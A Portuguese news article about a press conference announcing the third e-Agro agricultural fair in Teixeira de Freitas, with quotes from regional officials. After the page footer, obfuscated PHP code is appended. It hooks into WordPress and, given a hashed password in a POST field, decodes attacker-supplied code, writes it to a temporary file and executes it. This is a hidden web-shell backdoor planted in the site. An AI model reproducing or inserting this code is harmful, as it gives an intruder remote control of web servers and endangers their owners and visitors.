• SEJA BEM-VINDO

Coletiva de imprensa aumenta ainda mais a expectativa para a 3ª e-Agro em Teixeira de Freitas

Publicado em: 16/11/2021 Atualizado:: novembro 22, 2021

A terceira edição da e-Agro, a ser realizada em Teixeira de Freitas, contou com uma coletiva de imprensa na manhã desta quinta-feira, dia 11, no Parque de Exposições Temóteo Alves Brito, local onde acontecerá o evento.

Na ocasião, os realizadores Faeb/Senar e Sebrae puderam apresentar a repórteres, e a toda a sociedade, estrutura e programação do evento, que ocorre entre 17 e 20 de novembro.

A estimativa é de que seja o maior evento para a agropecuária da região do Extremo Sul Baiano, totalmente gratuito e com foco em inovação para o campo.

 

O gerente regional do Sebrae, Alex Brito

 

O gerente regional do Sebrae, Alex Brito, destacou a relevância da e-Agro para a inovação e a tecnologia para o agronegócio. “É trazer soluções práticas e objetivas para o homem do campo que vier. Convidamos desde já a estarem conosco. Teremos diversas exposições, temas discutidos em diversos espaços, além de diversas novidades que serão apresentadas durante o período”, disse.

 

Dori Neves, presidente do Sindicato dos Produtores Rurais de Teixeira de Freitas

 

Dori Neves, presidente do Sindicato dos Produtores Rurais de Teixeira de Freitas, classificou como gigantesca a importância da feira e-Agro. “Isso já existe nas grandes empresas, com seus núcleos de tecnologia operando, mas que o pequeno não tem acesso, até acha que a tecnologia é cara. Pelo contrário, as inovações vêm para que ele produza mais e melhor. Tudo é ensinamento e vejo como uma possibilidade de negócio. É gratuita, mas é preciso se cadastrar. Não terá show. É uma feira para pulverizar o conhecimento”, informou.

 

A secretária de Agricultura de Teixeira de Freitas, Elenita Medrado

 

A secretária de Agricultura de Teixeira de Freitas, Elenita Medrado, disse que é “muito honroso” para a prefeitura participar de um evento de “tamanho peso”. “A e-Agro vem como uma feira diferenciada, atendendo ao pequeno, ao médio e ao grande produtor da região”, comentou.

 

O e-Agro reúne grandes empresas do país e facilita o acesso de produtores, com dinâmicas, Dias de Campo, espaço para startups, hackathon em solução de problemas e conteúdo qualificado. Um dos momentos mais esperados são as rodadas de negócio, com a responsabilidade do Sebrae.

 

Além de apresentar inovações e promover diversas oportunidades de negócio, o evento busca difundir conhecimentos estratégicos, com palestras sobre temas como revolução digital do 5G, sustentabilidade e tendências do mercado agropecuário interno e externo, sempre se apoiando aos três grandes pilares do mundo agro contemporâneo: tecnologia, organização social e sustentabilidade.

 

As inscrições já estão abertas e podem ser feitas no site www.eagrodigital.com.br.

 

 

Fonte e fotos: OSollo


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}